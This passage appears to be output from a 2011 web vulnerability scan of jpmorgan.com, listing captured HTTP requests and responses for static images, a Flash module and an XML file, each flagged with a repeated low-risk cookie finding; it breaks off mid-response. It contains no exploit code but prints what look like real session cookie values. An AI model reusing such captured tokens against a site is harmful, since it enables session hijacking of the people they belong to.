GET /images/homepage/2008_flash/img/home_publicsector.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa95-1a3c-5d889a40" Accept-Ranges: bytes Content-Length: 6716 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/home_smallbus.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa94-219a-5d889a40" Accept-Ranges: bytes Content-Length: 8602 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/img1.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:20 GMT ETag: "32a789-fbc-e3b4f400" Accept-Ranges: bytes Content-Length: 4028 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/img2.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a78a-191c-e3c43640" Accept-Ranges: bytes Content-Length: 6428 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/img3.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a78b-176c-e3c43640" Accept-Ranges: bytes Content-Length: 5996 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/img4.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a78c-10b2-e3c43640" Accept-Ranges: bytes Content-Length: 4274 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/img5.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a78d-1032-e3c43640" Accept-Ranges: bytes Content-Length: 4146 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/largeImg4.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:32:14 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a791-2ebd-e3c43640" Accept-Ranges: bytes Content-Length: 11965 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/swf/module.swf HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:12 GMT Server: Apache Last-Modified: Mon, 18 Aug 2008 15:32:28 GMT ETag: "32a785-6dd6-adc89b00" Accept-Ranges: bytes Content-Length: 28118 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-shockwave-flash
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/xml/module_data.xml HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 23 Aug 2008 13:28:21 GMT ETag: "32a782-6e9-871d4740" Accept-Ranges: bytes Content-Length: 1769 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: text/xml
<items> <item img="img/img1.jpg" largeImg="img/largeImg1.jpg" header="Corporations" link="/pages/jpmorgan/home/corporations" >J.P. Morgan offers trusted and intelligent advice to help corporations ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/shadow_bt_820.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:12 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 14:03:40 GMT ETag: "1fc6c-4db-f7a8700" Accept-Ranges: bytes Content-Length: 1243 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/shadow_lt.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:12 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:04:04 GMT
ETag: "1fc6d-600-10e8bd00"
Accept-Ranges: bytes
Content-Length: 1536
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/shadow_rt.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:12 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 14:04:25 GMT
ETag: "1fc6e-621-12292c40"
Accept-Ranges: bytes
Content-Length: 1569
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/close_large.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
ETag: "42d45-412-697f3180"
Accept-Ranges: bytes
Content-Length: 1042
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/close_small.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:18 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
ETag: "42d46-257-697f3180"
Accept-Ranges: bytes
Content-Length: 599
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_close.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:23 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
ETag: "42d47-340-697f3180"
Accept-Ranges: bytes
Content-Length: 832
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_next.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:23 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT
ETag: "42d48-2f0-697f3180"
Accept-Ranges: bytes
Content-Length: 752
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_prev.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:19 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d49-2e7-698e73c0"
Accept-Ranges: bytes
Content-Length: 743
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_slideshow_play.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:23 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
ETag: "42d4b-363-698e73c0"
Accept-Ranges: bytes
Content-Length: 867
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_slideshow_stop.png HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:30:19 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
